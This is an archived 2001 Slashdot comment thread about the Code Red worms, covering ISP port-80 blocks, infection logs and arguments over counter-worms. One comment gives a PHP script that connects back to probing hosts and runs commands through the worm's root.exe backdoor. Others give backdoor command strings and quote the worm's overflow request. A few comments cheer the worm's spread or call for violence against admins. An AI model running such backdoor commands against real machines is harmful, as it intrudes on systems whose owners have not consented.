Code Redux

I don't understand why Symantec classifies a "remote root" exploit as only "medium" damage. Code Red ^[?] is hitting cable modem networks especially hard, as the new variants scan "nearby" IP's in preference to random ones, which has apparently caused enough damage and network congestion that AT&T's residential broadband division (MediaOne) has cut off port 80 across their network to try and halt the spread of the worm, or so several submitters reported. Newsforge has a story about various reactions to the worm, and reader nettdata sent in an interesting story about the worm becoming the main course at a dinner of security specialists.

Re:My naive suggestion...

Why doesn't someone write a Code Red anti-worm - it spreads via the same mechanism as does Code Red, but once it has infected a machine, it uses its root privileges to close the door behind itself, then deletes itself. It could even send mail to the administrator of the machine indicating the fact.

So you want to start a virus/anti-virus war online, eh? If you build a bug to kill another bug, someone will use your bug to kill other stuff--it's not that hard to mutate your formerly "harmless" bug. Fucking idiot. Think before you post inane shit like this.

Cutting off port 80 (hahaha)

[CM39]

I saw one comment saying mediaone had cut off port 80 on infected machine. Well they have cut it off on all machines at least in the .ne area.

I don't run iis I run sambar server so am not and never was in danger of infection. The really ridiculous part of blocking port 80 is that it has leaks my two servers have only received 16 connections since yesterday afternoon where my normal hits are around 2000 per day.

The following is a sample of the 16 hits.

[08/Aug/2001:06:00:49 -0400] myservername 65.96.70.231 "" GET 404 "/default.ida" "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801% u9090%" 0 "-" "-"

For those of you who don't know that was an attempt at infecting me. If I were running a vulnerable system
I would now be infected so mediaone's efforts are a total waste of time, all the fools have managed to do is block all my legitimate traffic while still allowing code red in.

Re:You misunderstand the danger

[Unknown+Bovine+Group]

If you're talking about the Microsoft patch, you're the moron. You're right that the worm has been disassembled and we know what it does, and it's NOT only memory-resident. The Microsoft patch will save if you only if you're not already infected. If you have been infected, your registry settings have been altered to allow filesharing of your c and d drives and a trojan explorer.exe has been placed in your c:\ directory to restart the worm on reboot (and then run the real explorer.exe so you don't notice).

Re:Code red growth spurts

[Anemophilous+Coward]

Actually it is not FUD here at our college. The main university recomendations for new students are for them to purchase computers with Win2000.

Some of the sub-colleges, business and engineering even *give* notebook computers to students here. These are all configured with Win2K for integration with their particular mail and online services. Of course, *hopefully*, the computers handed out by the university will be patched. But as I mentioned in my post, there are individuals on campus who still dont keep up on their administration duties.

And again, most of our statistics showed a majority of students migrating to Win2K over the last year. We had plenty of mini-web servers running here at our campus. So don't disregard this as FUD. Perhaps at your local university, there isn't a push to Win2k. At ours there is and this could very well be commonplace at others, so my original post was not to spread fear but present a 'heads-up'.

- A non-productive mind is with absolutely zero balance.
- AC

Re:The Perfect Solution:Code Redmond

[Unknown+Bovine+Group]

Microsoft creates a similar internet worm that gains admin access to install the patch! I'll leave it up to you to name it

....Code Redmond?....

Re:OT: pedantic correction

[staplin]

Yeah, yeah I know 'boxen' is plural.

I was typing too fast and my "any Win boxen" became "a Win boxen"...

HP Printers, CSCO routers and port 80 (mixed bag)

[stevedl]

Hmmm well - can't comment on the routers but I snagged a 3 hour job updating the firmware on an HP laserJet 4000 which was dying inexplicably - it only started doing so last week.
Rumours are that it is port 80 related. Firmware update (which is no walk in the park esp. on a Win2k only network - thanks HP) seemed to do the trick.

I'm still getting hit a couple of times an hour with port 80 requests ... whois says most of them seem to be from .tw I'm nice and cosy in my firewall ignoring them ...

And the whole deal with providers blocking port 80 - I'm not supporting their actions , haven't affected me and I haven't thought about this much etc. etc. - but would this drop requests to access port 80 on infected machines - which should prevent the unwashed DSL carriers from being dragged into a nasty DoS via access to http//your.box.is.mine/scripts/ blah blah blah
Or am I talking out of my dubya ??

Mozilla 0.9.3

[Dragoness+Eclectic]

On a totally unrelated topic, is anybody else using Mozilla-0.93 and getting the "Slow down cowboy" message when posting to Slashdot? It seems like Mozilla is loading every page twice.

No, just you. This is my third post today, using Moz 0.9.3, build ID: 2001080110, Win32 version. No problems with /. posts.

Re:My 'Data' Light has been going steady since Fri

[mattc]

Yeah, my receive data light has been blinking nonstop too.

I'm on a small home network with a couple of other people so at first I thought someone had left one of those annoying "Gnutella" programs running (which have similar effects to a DoS).

But then after reading about this virus I realized that it was it that was doing all this. It's amazing! I didn't realize how much damage a single 'doze virus could do!

- Safe behind firewall

Re:Code Red Self Test

[kimihia]

I've seen some interesting fun done with backdoor.

One was the changing of the default home page to say ... "This system has been infected! Fix me up as soon as possible!"

I've also heard reports of people trying to run Internet Explorer and forward them to the page where the patch is, but from what I've heard it hasn't worked.

A couplea hours ago this one was quite funny: http://202.108.221.61/

Re:New payload?

[weis]

That's the footprint of the Code Red scanner that eeye.com puts out.

Re:RoadRunner Fairfax VA unusable

[balmeida]

Yep... although I'm in springfield, the cable has been up and down like a yoyo since Thursday or Friday ... and the times when it HAS been up it's been constantly berrated with CR2 attempts and being massively spammed with ARP packets ... *sigh*

Re:However, it it not remote root

Here was my solution. I mapped .IDA to PHP4, then created "default.ida" in my server's root directory, with the following code:

<?php
$fp = fsockopen ($REMOTE_ADDR, 80, $errno, $errstr, 10);
if ($fp) {
fputs ($fp, "GET /scripts/root.exe?/C+start+http://www.microsoft.co m/technet/security/bulletin/MS01-033.asp HTTP/1.0\r\n\r\n");
fclose ($fp);
}
?>

This will launch a web browser window with information on patching their server. This could be modified to do any number of things.. shut down IIS itself if you can.

Hope this helps :)

RTFS

[StikyPad]

This letter was posted in the story.. Does anyone read those anymore?

Re:Sarcasm

I must have missed the sarcarism Or maybe that was a poor attempt at sarcasim After you get the grammar right you can work on the spelling of SARCASM

poll

[smeeze]

next poll:

number of code red attack attempts:
o 0-10
o 10-100
o my IIS tried 600 attacks

Re:Small util for Windows to listen on port 80?

[budgenator]

Connecting a stupid windows box without a firewall like zonealarm or blackice is just STUPID. I have trouble believing the /.ers do it. (maybe the poster is a Microsoft spy) Linux doesn't have to beat M$ off of the desktop, this whale really seems to be beached and sufficating under the weight of its own buffer over-flows. They are going to have to go through millions of lines of code written by thousands of independant contracts to find them all; in short its probably impossible.

Re:My naive suggestion...

Ditto to you! The code red worm already allows mutations as evidenced by the variants. You're just lucky that no one has already deleted your system yet.

Re:Cutting off port 80

[Fjord]

I was:
Front page: click on "site map"
Site map: click on "Policies"
Policies: click on "What is the AT&T@Home Cable Internet Service Subscriber Agreement?"
What is the AT&T@Home Cable Internet Service Subscriber Agreement?: click on "Leased Modem Subscriber Agreement"
It's right there in 9(b)

Cure for Code Red

[von+Prufer]

Someone should just write a Code Red variant of their own to download the patch for the web servers and install it...

Re:Cure for Code Red

Someone Should.
But It's more fun to see how far its gonna go

Note to windows users

[cronik]

This was a comment stating that it wasn't hard to switch to *nix or BSD and configure a web server.

Re:Bring them to justice

If someone should be brought to justice
Its only Microsoft

and yes you found us.

Re:Medium damage

[Zaediex]

There's also the fact that the shell that the worm installs does not have sufficent privledges to do anything extremely destructive. Hell, you can't even use "net stop" to shutdown a server after it scans you. I think Symantec's 'medium' classification is correct, after all this little bug could have been a whole lot worse than it was.

Zaed...

Re:someone should make a code red three

[TazMainiac]

This is a really good question, I haven't even seen any discussion about it. Really, how hard would it be to write another virus/worm that acts like Code Red II, but instead of the exploits does something like:

a) shuts off IIS
b) downloads the patch and installs it
c) puts a big notice on the screen about what it just did

Seems appropriate to fight fire with fire, so to say.

Re:Cutting off port 80?

That isn't what my cable modem ISP is doing. As the article said, AT&T shut off all incoming connections to port 80. This is stupid and accomplishes nothing. The hosts receiving the connections aren't the problem. It is the ones sending them. And while they can't infect any more AT&T customers' machines, they still can infect distant hosts. And they haven't protected any AT&T hosts, either, since any vulnerable machine is already infected. I got over 1300 infection attempts. What they should have done is block outgoing connections to port 80 from the infected machines, like the provider you mentioned. You can bet that would get people's attention.

Re:DAMNIT WILL SOMEONE PLEASE....

Let it leave
we want it to exist

Thats a point

Re:Twenty-four hours.

[binner]

I've been monitoring my logs similarly (289), and have had this little thought in my head. Has anyone set up a 'Wall of Shame'? It could be especially embarassing for the Fortune 500 guys. It'd be trivial to do, and definitely worth a laugh!

-Ben

YOU SHOULD BE BANNED!

AT+T say you should not be running servers as you slow everyone else down. I hope they ban you.

Portsentry is your friend

[peril]

been running full smtp, http, https, and ssh on @ home forever, with a portsentry monitor to blackhole scanners. With the apache logs, at least I can blackhole more hosts, and not have any risk of future exploits of those hosts impacting me.

I'm not too concerned about the TOS violations/enforcement, as services can move to any port no problem. (Just have to set up the a new mailer in sendmail for the desired port from yer buddies relay.)

There really can't be anyone more savvy working @home than a group of 10-15 unix/networking people "thinking out loud" on irc. (Except fer them with their irc buds...)

--Toilethead

Our university is blocking infected systems

[Buttonius]

The network managers at the Delft University of Technology are monitoring the scans by the infected systems. If they can not contact the maintainer of these systems they will configure the ethernet switches to isolate them from the network.

Only takes 12868 bytes

[kimihia]

Code Red will only slurp down 12868 bytes.

Don't do it - the 'net has enough stress on it with 5.9 million IIS running hosts trying to infect everything in site without you transmitting a bunch of zeroes.

Yes, so I had similiar thoughts, but Daniel Lawson taught me better. (Thanks Daniel BTW.)

Re:Bring them to justice

[WildBeast]

I would say, both.

Re:MS Problems Cause Patch Failures

[beable]

A recent issue of RISKS Digest pointed out that the site with the patch to fix this IIS problem has problems itself. FTP downloads of the patch are often being disconnected, resulting in receipt of only a partial patch file.

That's because Microsoft ships their patches as exe files. If only they would be sensible and ship the patches as some sort of zip file, then you could tell if a file was truncated. It makes me shudder to think that people go to get a virus patch from a website, and the only format they can get it in is as an exe file. Maybe it's a trojan? Being in a zip-type archive gives you marginally more security, because they can put a digital signature in there as well. With an exe, you're just playing Virus Lotto every time you run one.

Re:Code Red Self Test

[The_Weevil]

All the Win2k users you know are running IIS?

Err, yes, since it's bundled in Win2k and not disabled most people don't even know it's on. Does the indexing service rely on it or something? I heard code red gets in via the Indexing Service in win2k, or maybe that's just a load of bullshit. What I do know is, most people are dumb. Yes, my friends who run Win2k are stupid, although i would have chosen the term 'inherently stupid'.

Weevil

Re:this thing is fascinating

[twinpot]

I noticed the exact same pattern. First it started with two attempts from one address, now it's two attempts, pause, one attempt.

Fascinating...

Re:small survey

[IronChef]

How did you automate that? My shell kung fu is weak.

Or do you just have a lot of time for copy/paste? ;)

FWIW I manually did about 40 IPs the other day. Similar ratio.

Yes to RED

Yes, Yes, Yes
We would distribute code red and others to come
and would intentionally infect our NT boxes
so distribution continues.

It should only stop when Microsoft is stopped.
They Declared War ,we Accepted it.
It is survival of The strongest.

There is no Place for MS on OUR NET.

<!-- OpenSource Terrorists. -->

PS:
We Thank Microsoft Corp.
for making this code(RED) possible.

Comment removed

[account_deleted]

Comment removed based on user account deletion

Re:@Home

[TazMainiac]

It's all the arp requests from all the Code Red
probes for non-existant IP addresses.

tcpdump -i eth0 -n

(or whatever your external ethernet interface is).

I was seeing 2000/minute ARP requests on Monday,
don't know what it is now...

Re:Medium damage

[Unknown+Bovine+Group]

We now have a millions of machines excercising security by obscurity.

If the infected machines are constantly running 300 threads advertising the fact that they're compromised, that's not very obscure, now is it?

Considering how many scans I get on a cable network and how prized cable-based zombie machines are for DDoS attacks, I'd say there's a good number of scripties out there amassing huge collections of boxen...

"Hacked by chinese" WTF? Spending all that time devising a crufty virus, and that's all they have to say?

Yes it was rather crufty wasn't it? ;) I believe the 'Hacked by Chinese' tagging was limited to CodeRed 1 (and 1a or whatever they call it). Which is totally NOT what we're talking about here. In case you didn't know.

Re:BIG NEWS:

idiot

Re:Why code red is still around

[budgenator]

Maybe no one told their sysadmins that they are no longer running BSD spoofing that it is M$ yet!

removal of code red

[markw98]

Ok, here's the beef. A friend and I are having this debate. We both have linux machines which are logging all these attempts to infect our machine from neighboring machines (who's owner's weren't savvy or smart enough to avoid infection, or were just a day late) Is it unethical to offer removal services to these poor saps for a fee? I say no, its not. His argument is, they might thing you're the one that infected their machine in the first place. While his argument might have a valid point (somewhere), if I am offering legitimate services, and can prove that my machine is being attacked by their machines, what is wrong with getting paid to help these people clean their machines? Someone explain this to me. Regards, Mark

ALL WINDOZE

[twitter]

It's more likely that his network has been back orificed long ago by someone's email cartoon or toy exe, a screen saver, pointer program or other piece of shiny frill. "Try to hit the gopher, while I root you out." The windows world has serious problems, and it is irresponsible to use that kind of software.

Re:Man, I wish...

[jeremyp]

I can't speak for bind, but there are no known security exploits specific to current or recent releases of sendmail. By "recent", I mean in the last three to four years.

Re:It is only Medium DAMAGE!

[jesser]

I agree. <imo>Anti-virus software companies are in the business of protecting against viruses; of preventing a large number of users from being compromised by the same code. They are not interested in the kind of security that would prevent script kiddies or social engineers from gaining access to your computer, and so they rate viruses by the amount of damage they cause, rather than rating security holes by the amount of damage they allow. I suppose they do this to be consistent with their stance that "the viruses are the enemy".</imo>

By the way, did anyone else think it was strange that CERT listed anti-virus software companies, and only anti-virus software companies, in the "vendor information" section of their advisory about SirCam? They could have easily targeted

• E-mail client vendors, for having poor user interface surrounding attachments. (Especially Microsoft, for releasing at least one version of OE that shows a very similar dialog when you double-click a .jpg attachment as it does when you double-click a .exe attachment.)
• Microsoft, for relying on extensions as the only way for a user to tell the difference between a document and a program, rather than doing one or more of the following:
  • Giving users and programs a way to flag files as "executable" (or as "not executable"), like linux does with the +x mode.
  • Using a single, special extension for executable files. For example, foo.vbs would have to be renamed to foo.vbs.exe before it would run.
  • Using a special type of icon, or icon overlay, to indicate that something is a document. For example, always show documents as a piece of paper, and show an icon chosen by the associated application in the middle of the paper.
• Microsoft, for not providing a function in Windows for "is a file with extension .foo a document or a program?".

Re:mediaone EUA ALLOWS FTP AND HTTP SERVERS

[IronChef]

I wonder how far it can be pushed? My server on @Home dishes out almost 3,000 pageviews per day. (!) I'm starting to get worried. I need a backup plan in case they pull the plug on me.

Re:No patch for Alpha NT 4 machines

[BrookHarty]

It infected Alpha code for Indexing service, so it wasnt only x86. Wonder how many other worms are can do this type of damage.

Re:BIG NEWS:

[DeputySpade]

AIDS infects others for many years, and then kills its host.
Um... Actually, doesn't AIDS simply leave root holes open so that other attackers can come in and eventually bring the host down? That's actually very similar to Code Red II

Re:Code Red Self Test

[beable]

I've also heard reports of people trying to run Internet Explorer and forward them to the page where the patch is, but from what I've heard it hasn't worked.

I think it does work you know. Look at this page . As you can see here, infected computers are responding to commands to start up a browser and load a web page.

On a totally unrelated topic, is anybody else using Mozilla-0.93 and getting the "Slow down cowboy" message when posting to Slashdot? It seems like Mozilla is loading every page twice.

Win2K a bit more common than one would think.

[SimplyCosmic]

Doing student network support for a midwest college, I came across several newly purchased IBM Thinkpads which came with Win2k installed. Enough, that I'd say one out of every thirty people with a laptop there had it.

Additionally, since alot of the colleges in Ohio have site license deals with Microsoft so that students can get the OS for cheap (or even free), there were just enough people figuring that 2000 must be better than 95, simply due to the numbers, to cause us a bit of aggravation.

Of course, out of those people, most probably don't have IIS installed, but I've come across just enough people who install random things they don't need to say that the problem, while small, certainly isn't insignificant.

Stop it!

[muffen]

Let's just write a new worm that goes out and finds computers with this vunarbility. If it manages to get onto a computer, it will automaticly download the microsoft patch and apply it. Problem solved... wasn't so hard now.. was it?

Re:You misunderstand the danger

[Des+Herriott]

I really don't think you're in any position to call Illserve a moron. Your advice is dangerous & stupid, Illserve has it right.

Even once patched, your machine is not safe. "You won't necessarily find all backdoors" ? Then your machine is toast anyway.

Verizon closes port 80 indefinatly

[cybrthng]

Verizon has told me they closed port 80 indefinatly. Thus making my dsl useless. They start filtering SMTP access to non verizon email servers today (which don't let you said email that isn't using a verizon domain).

I know i'll be switching. I don't pay 80 bucks a month to just surf the net on verizons terms. I do use my DSL for work, VPN, testing websites and personal pages.

Is there anything "We" can do. The terms of service specifically state it is up to the END user to do all necesseary functions to protect HIS data. Verizon makes no gurantees of service so how can they modify the service?

I wish i could get a class action for something.. they're limiting email to verizon.net emails only, filtering access.. what next?

Laptops

[Des+Herriott]

Even if border security is good, consider: do you have any employees with vulnerable NT or 2K laptops? Do they take them home and connect to the internet from there?

If the answer to the above two questions is "yes", then corporate infection is pretty much inevitable.

We need a 'cultural revolution'..

We need to do something like in China during the time of MAO, the cultural revolution, gather all the sysadmins who dont do _SHIT_ with their boxes and dont check up on advisories etc, and have them shot! This code red crap was known as a buffer overflow as early as June 18th, and still machines are getting infected! its so .. fucking.. pathetic. Well, not surprising when you consider that many commercial servers are not even patched with hotfixes known from 1998 etc.. Stupid admins must die.

Re:check out the above link...

[powerlord]

Has anyone also noticed that Win2K comes with (and installs as part of the IIS "Group") an SMTP server ... gee ... any bets what the next round of expoits might target? :)

Re:Code Red...easy fix

how would it spread then?

White Hatting Code Red

[TOTKChief]

Better yet, why not just run the patch installer for them?

All well and good, I guess. But what of the day when people don't see your white hatting as such? Then someone will come out with a variant of your white hat hack on Code Red and, instead of having it hit the patch, will have it install something really nasty on the box, making it look like they're white hatting.

Yes, this could be done now--infect a box, then have it hit a second virus that slams the box after the DDoS is done--but it would be more elegant after someone started to white hat Code Red.

Re:Bring them to justice

Nah, we should track down the stupid admins that get this exploit installed on their servers and have them flogged,and sue them for financial damage.

Re:Cutting off port 80

[RocketRay]

Just put your Apache server on another port, say 8080. That's what I did. Then you just tell people to tack ":8080" after your domain.

/etc/httpd/conf/httpd.conf is your file!

Re:"Medium" Damage

[netsharc]

Not that an empty hard disk would be able to host a server that can spit out that HTML...

Ooh, that would be a neat hack; own the server, setup a ramdisk, move yourself into it, setup a HTTP server (in RAM), kill all running programs (that's "take over control of the computer from Windows") and format the disk.. woah, pull that and I'll be impressed. :) .. reboot the machine and everything's gone.

check out the above link...

[budgenator]

The graph at netcraft.com Survey shows Apache's market share slipping lately, I bet that changes pretty quick. And just think Microsoft is paying for ads in "Linux Magazine" to woo back Hosting providers, just before their software gets plastered by CodeRed et.al. Glad we are not paying extra for an NT server.

Maybe Microsoft's next EULA should have a clause that alows Microsoft to for collect damages to their reputation for "failing to properly maintain and apply official required Updates to Microsoft Software".

I think John Wayne said "Life is tough, it's tougher when you're stupid." Get the patch or turn it off.

Re:check out the above link...

[heikkih]

And maybe the reason why IIS is gaining on Apache is the same reason this worm still is so widespread: Win 2K installs IIS as default without telling the user.

An ip-address in my office building popped up in my apache-logs on monday. I tracked the guy down, and it turned out he just had plugged a laptop with a freshly installed win2k into the network.

Five minutes after he had come to work, his machine was compromised. I told him to take a backup of and review all necessary documents on his machine for possible other infections/fuckups and have the machine reformatted/installed.

These days you can't even install win2k on a computer connected to the net. It will be compromised before you've got the time to path it and/or deactivate the default settings.
--

Re:check out the above link...

[stx23]

Win 2K installs IIS as default without telling the user.
Unless you are installing Win2K server, it doesn't install IIS. If you are installing Win2K Professional(aka Workstation), you have to explicitly select IIS for install.

Re:It's about time...

10 simulataneous connections.

Re:Man, I wish...

What makes you believe that this webserver is the ultimate cause of computer security bugs?

Past track record, and the lack of any way to audit it for further issues?

Re:Cutting off port 80?

[jeremyp]

My local cable provider technically bans any type of server, the reason being a) the bandwidth is asymmetrical b) they want you to buy a more expensive business contract to run servers c) they can give people NATted addresses. However, they don't appear to monitor traffic and provided you don't abuse the system they don't care.

Re:My naive suggestion...

[netsharc]

It would be a nice idea, I remember reading a reply to a similar idea as "It wouldn't be nice netiquette if you messed with other people's computer, even if you mean well.".. well I would say if someone writes the anti-worm, they can just tell the clueless admin "Sorry I had to do this, since you were too clueless to patch your own server."..

Re:Cutting off port 80?

I'm not sure what Cutting off port 80 meant for them, but at my School, the students machine cannot access ports 80 of servers outside the school network.

So they're not blocking our port 80 but other port 80. We can still access website using the school proxy/cache

This way, infected IIS server inside our network won't abuse internet bandwith and won't spread the worm outside our network. Since all production servers in the school are Unix admins don't don't care about contamination in their network.

Re:Cutting Off Port 80?

Yes it is, at least in my location.

The policy seems to vary depending on where you are in the country.

I *wish* they'd block off port 80 here.. my rd light has been blinking nonstop for days!

Re:Twenty-four hours.

That's what the ambiguous "Underrated" moderation is for.

Re:Cutting off port 80

http://help.broadband.att.com/faq.jsp?content_id=4 16 NO servers. Therefore, they will get no more money from me.

Re:Code Red Self Test

[staplin]

True, this will tell you if you are *infected*, but it doesn't tell you if you are *vulnerable* (but not yet infected).

note: to windows users

[budgenator]

neither is CodeRed, SirCam32 ect.

Re:Useless use of cat

[beable]

You might have more chance to get hired if you changed
cat file | grep pattern
into
grep pattern file

I like to use:
cat file |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat |cat | grep pattern
Now that's abusing a cat!

Re:small survey

[MS]

Many of the "Under Construction" pages or "successful IIS install" are in reality multi-homed webservers. This is the page you get per default, if you don't specify any hostname.

You may look up the IP-Adress on netcraft.com and see which other webservers are running at the same Netblock Owner, you'll be surprised!

Meanwhile the Hits from CoderRed on my Server have reached 12000 (yes, it's a multi-IP-server), and are doubling every 2 days with no end in sight!!!

bye
Markus S. --

Re:BIG NEWS:

[TrollMaster5000]

True. True. They are lazy. Hell, when the bind bug came out, I was one of the 1st 50 to patch mine. A lot of those MCSEs don't even know its out there. Im still getting hits on Apache.

Re:small survey

[Midnight+Thunder]

I don't know what the tester used, but you could easily throw something together in 10 min using Java. You could probably do this just as easily with some other language, but Java is the one I know best and offers a good API for accessing http servers ( java.net.UrlConnection ).

Re:Cutting off port 80?

[ewilts]

Here's AT&T's e-mail response from Tuesday morning:

Thank you for contacting AT&T BroadBand Cable Internet Service.

We have blocked port 80 as a temporary measure and will be lifting the block when our network engineers have finished their work. I do not have an estimated time for this, however. I apologize for any inconvenience that you may be experiencing.

During a Tuesday afternoon chat session, another one of their support reps stated:

We may have some more information regarding port 80 later this evening, otherwise you could check back tomorrow for possible updates. I do apologize for the inconvenience.

On the chat session, whoever answered the chat at least knew about the port 80 block so the word is getting out within AT&T support - not like Monday when they were totally clueless. The online Network Status is still vague "We are experiencing service interruptions affecting All Regions that may cause intermittent network connectivity. "

As for whether or not AT&T allows servers is up for debate. Their 2nd level tech support said they don't, but I quoted the leased line subscriber agreement, located http://help.broadband.att.com/subagreelease.jsp, specifically section 9b that says that servers are allowed.

AT&T @Home Not Cut Off in Palatine, IL

[Chelloveck]

AT&T @Home hasn't cut off port 80 where I live yet (Palatine IL, the NW Chicago 'burbs). A quick grep of my Apache logs shows that I got hit 499 times yesterday with requests for 'default.ida'. Just over 1200 times since this thing broke started.

What really annoys me is that I just inherited responsibility for maintaining code for a print server product we sell. Code Red is knocking these things off the net left and right (buffer overflow processing the URL, I suspect) and customers are screaming. Oh, and did I mention that since inheriting the code I haven't even been able to get the fscking debugger to run yet!?

Why anyone would leave a printer sitting wide open on the wild net is beyond me, but apparently it's not acceptable to just tell the customers to put it behind a firewall where it belongs...

Re:Code Red Self Test

[daknapp]

Ohohoho. Practically all win2k users i know are infected. how amusing.

Really? All the Win2k users you know are running IIS? That seems weird. Maybe your friends are just particularly stupid.

Re:You misunderstand the danger

[thogard]

I was probing machines that probed me for a working root.exe and one machine was "owned" within 10 minutes of probing my cable modem connected box.
Out of the original list of 39 or so that had a working root.exe, none of them are now repsonding to thouse request because they are now under the control of someone else.

Re:small survey

[vtweb]

Since Aug 1st, My class C block has
experienced 109,666 code red
infection attempts.

83,499 are version II attempts.

Of all attempts,
30,388 are from 61.74.162.3
14,550 are from 61.74.162.16
13,111 are from 61.74.162.10

The remaining source IPs are all sourcing
less than 100 attempts each (most single attempts).

Re:"Advanced Network Security Training"

[Yorrike]

Agreed.

Especially since people are reporting attacks from Hotmail, of all places.

.NET is going to be a fiasco if this is any indication (which it is).

ASCII grapher for tracking Code Red

[ip4noman]

I've written a little ascii grapher which can be used to track Code Red from your apache logs.

How to graph Code Red attacks by day:

$ grep default.ida access_log | ./count_apache_date.byday | ./ascii_graph -c 2
2001/07/19 18 xxxxxxxxxxxxxxxxxxxxxx
2001/07/20 02 xx
2001/08/01 11 xxxxxxxxxxxxx
2001/08/02 25 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
2001/08/03 26 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
2001/08/04 27 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
2001/08/05 28 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
2001/08/06 29 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
2001/08/07 36 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Source code with examples: (requires perl):
http://www.ip4noman.org/code_red.tgz

Re:Twenty-four hours.

[Fesh]

*laugh* Damn... I don't know whether that deserves +1,Insightful or +1,Funny, but it definitely deserves a +1...

Re:Bring them to justice

[WildBeast]

That's not the case, he seems to be spreading it via email and his intentions are pretty bad.

Re:Ease of Attack

[beable]

How about:
root.exe?/c+explorer+mailto:billg@microsoft.com?Su bject=Please make Windows into a secure operating system!
If only I had a windows machine so that I could work out the right command...

Re:Cutting off port 80

[Refried+Beans]

yes, but can you find a link to that page? I wasn't able to find it. Also, you can find that page under any topic by appending "&category_id=n" to the URL. The policy looks depreciated to me. The tech support agents need to be retrained.

Re:Man, I wish...

[Trepidity]

That's exactly what I would say to the thousands of sysadmins who still insist on running Sendmail and BIND. Code Red on IIS reminds me a lot of the Morris Worm on Sendmail...

Re:OT: pedantic correction

[rkent]

I don't know if it works, I don't have a Win boxes to test it on...

LOL! I bow before your excellence.

Re:Crikey

[mcleodnine]

Well then it's either "Lucky You!" or "You're looking at the wring logs!"

Re:Why code red is still around

[iturbide]

Get a clue. That's a proxy server passing on the request for an infected client.

Mind you, you can configure those to not pass on Code Red requests. Which might be a Good Idea.

Re:Small util for Windows to listen on port 80?

[synthe]

Thank you very much for this, I have no programming experience and I knew it had to be something relatively simple to do :) I'd like to file a bug report though, you have old and new swapped. the worms that use a series of N's are the old ones, and the worms that use X's are the new ones. I just thought it strange that in the last 10 hours my linux box got 22 new and 2 old attempts, while my windows box on the IP next to it got 47 "old" attempts and only 2 "new" attempts in about 16 hours. All in all, great program though. I used it on my machine at work and found that our main internal webserver was infected with the new strain, if its available to the Internet as well as the intranet we have a problem (but not mine to fix).

Re:Ease of Attack

[aoeuid]

Make sure to wrap it in quotation (%22) marks! =)

Re:Cutting off port 80

[Fred+Ferrigno]

Try this.

Re:BIG NEWS:

[ergo98]

I hardly think it's MCSEs that are the culprits for the spread of this virus: Instead it's full of themselves, sure they know everything wankers who installed IIS to show how 31337 they are (the first step of most "MCSEs" is to remove all of the unnecessary ISAPI modules, which are pretty much all of them. So far the .ada and .printer extensions, which are used by probably

Re:Code red growth spurts

[rlowe69]

A good portion of them have probably been unattatched to the network, or will be brand new machines just for school.

This may be insightful, but how many of these people will ACTUALLY be running a vulnerable web server? Only those that have installed IIS with Windows 2000! I am willing to bet that this number is negligable among college students, especially those with new computers. Those computers will most likely be running ME, which is less expensive and is more suitable for home/student use.

Those students running Win9x or ME are NOT VULNERABLE from Code Red or CR II and those running NT4 are NOT VULNERABLE from Code Read II. This kind of FUD is what makes people panic. We don't need it in the news and we especially don't need it on Slashdot.

Re:It is only Medium DAMAGE!

[Trepidity]

Just look at the information - if after the infection your mp3s and Word files are still there, and still seem the same as they were before, you have little damage. Sure, you might have to wipe and reinstall the OS, but your _data_ wasn't damaged, and you can pretty easily verify that.

Re:Ease of Attack

try GET /script/root.exe?/c+dir+c:\

What it does

[kimihia]

I tried it out. This is what appeared in the log.

- 216.201.108.18 - - [08/Aug/2001:19:29:45 +1200] "GET /scripts/root.exe?/c+dir+c:\ HTTP/1.0" 404 286 "-" "-"

- 216.201.108.18 - - [08/Aug/2001:19:29:46 +1200] "GET / HTTP/1.0" 200 1948 "-"
"-"

210.zz.zz.zz 216.201.108.18 - - [08/Aug/2001:19:29:46 +1200] "GET /NULL.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX=X HTTP/1.1" 404 284 "-" "-"

- 216.201.108.18 - - [08/Aug/2001:19:29:48 +1200] "GET / HTTP/1.0" 200 1948 "-"
"-"

(I've snipped by IP BTW.)

It looks like it is testing for:
* Code Red 3 backdoor (found on all good Windows 2000 systems)
* A web server
* The ida overflow
* A web server (again)

Cable networks

[J'raxis]

By the way: The Code Red scans went dead yesterday morning on MediaOne.net (at least the 66.* where I am). It looks like they're blocking all connects on port 80 now.

Re:Damage rating

[Tony-A]

You're using Unix criteria, not Microsoft Windows criteria. Remember, in the Microsoft Window world, mediocrity is an aspiration. Symantec hasn't lost their mind. They never had one to lose.

Re:someone should make a code red three

[GregGardner]

That is amusing, but the Code Red III I would like to see would take control of your IIS server and then install the damn Code Red patch. Then after a day or so we wouldn't have to hear about this damn thing anymore.

Let'S Stop CodeRedII - I Think We Can

Alright, after answering the umpteenth call today, along the lines of: "Why is my cable modem light biinking non-stop?" I'm at wits end. I don't even work for the cable modem provider. I'm just the village geek.

We gotta put a stop to this.

I think we can.

